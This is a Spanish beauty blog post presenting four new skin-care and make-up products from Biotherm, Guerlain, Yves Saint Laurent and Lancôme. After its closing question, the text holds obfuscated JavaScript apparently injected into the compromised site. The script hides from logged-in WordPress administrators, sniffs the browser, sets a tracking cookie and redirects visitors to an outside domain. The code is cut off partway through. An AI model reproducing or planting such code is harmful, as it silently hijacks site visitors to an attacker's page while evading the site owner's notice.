novedades perfumes online

Hoy venimos con una nueva sección en el blog que esperemos que os guste.

La idea es ir presentando periódicamente 4 productos que sean novedad ya sea en el mundo de la cosmética, los perfumes o el maquillaje.

Biotherm nos presenta Liquid Glow un innovador aceite que hará las delicias de nuestra piel aportándole luminosidad y un efecto aterciopelado.

biotherm liquid glow

 

 

 

 

 

 

 

 

 

 

 

Se trata de un aceite seco que pertenece a la gama de Skin Best de Biotherm, su poder antioxidante es aún mayor que las del serum gracias a su alta concentración en astaxantina.

La astaxantina es un extracto de algas tiene un poder antioxidante 100 veces más potente que la vitamina E. Liquid Glow de Biotherm nos ayuda a combatir el estrés oxidativo de los UVA, el fotoenvejecimiento y la hiperpigmentación provocada por los UVB.

Guerlain y sus famosas perlas “Météorites” se reinterpretan en unos mosaicos en tonos luminosos que a la vez corrigen para aportar a nuestra piel una dosis delicada de luminosidad.

Como si de magia se tratará estos finos polvos prensados fijaran la base de maquillaje dejando un resultado deslumbrante.

meteoritos guerlain

 

 

 

 

 

 

 

 

 

 

 

Los polvos reveladores de luz “Météorites” de Guerlain contiene tonos correctores (rosa para refrescar, malva para captar la luz) que unifican la tez y tonos iluminadores ajustados a cada tono de piel para recrear una luminosidad a medida. La piel revela toda su luminosidad y su belleza… suave, unificada, delicada, naturalmente sublimada.

Seguimos con otra joya de tocador, Yves Saint Laurent y los coloretes de la gama Blush Volupté.

colorete yves saint laurent

 

 

 

 

 

 

 

 

 

 

 

Una gama de coloretes en tonos radiantes y luminosos con dos colores y texturas en uno. Yves Saint Blush Volupté es un colorete e iluminador que marca el contorno y logra un brillo vibrante. Con la tecnología “color prisma de luz”, este colorete ofrece una consistencia equilibrada entre cómo el colorete se ve en su envase y el resultado de la aplicación.

Te recomendamos eches un vistazo a sus tonos ideales para esta primavera.

Lancôme conscientes de la dureza de un duro invierno ha creado Absolue Precious Oil, especialmente concebido para nutrir intensamente la piel, sublimarla y desvelar su resplandor.

lancome absolue

 

 

 

 

 

 

 

 

 

 

 

El Aceite Esencial de Rosa, asociado a 6 Aceites Preciosos, despliega sus propiedades en una textura de una riqueza infinita, que se funde instantáneamente en la piel dejando un acabado satinado.

Los resultados son excepcionales: la piel está nutrida, tersa, divinamente suave y alisada. La piel revela un resplandor de juventud. Ideal para pieles desnutridas y dañadas que están faltas de luminosidad.

Repara tu piel y recupera la luminosidad de tu piel para esta primavera.

¿Cuál de estos productos te gustaría probar? ¿Conocíais alguno de ellos? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone